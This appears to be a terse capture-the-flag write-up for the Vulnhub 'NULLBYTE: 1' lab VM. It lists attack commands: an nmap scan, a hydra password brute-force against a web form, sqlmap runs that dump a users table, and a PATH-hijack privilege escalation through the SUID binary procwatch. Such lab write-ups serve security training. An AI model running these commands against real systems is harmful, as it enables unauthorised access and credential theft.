Vulnhub 126 NULLBYTE 1

Target VM link: https://www.vulnhub.com/entry/nullbyte-1,126/

Environment setup

Name         IP
Kali Linux   192.168.88.153
NULLBYTE: 1  192.168.88.152

Initial foothold

Port scanning

$ export rip=192.168.88.152
$ sudo nmap -v -A -p- $rip

$ exiftool main.gif 

$ hydra -l "" -P /usr/share/dirb/wordlists/big.txt 192.168.88.152 http-post-form 

$ sqlmap -u "http://192.168.88.152/kzMb5nVYJw/420search.php?usrtosearch=test"
$ sqlmap -u "http://192.168.88.152/kzMb5nVYJw/420search.php?usrtosearch=test" --dbs
$ sqlmap -u "http://192.168.88.152/kzMb5nVYJw/420search.php?usrtosearch=test" --tables -D seth
$ sqlmap -u "http://192.168.88.152/kzMb5nVYJw/420search.php?usrtosearch=test" --dump -T users  -D seth

$ cp /bin/sh /tmp/ps
$ echo $PATH
$ export PATH=/tmp/:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
$ ./procwatch


Last modified on 2015-08-01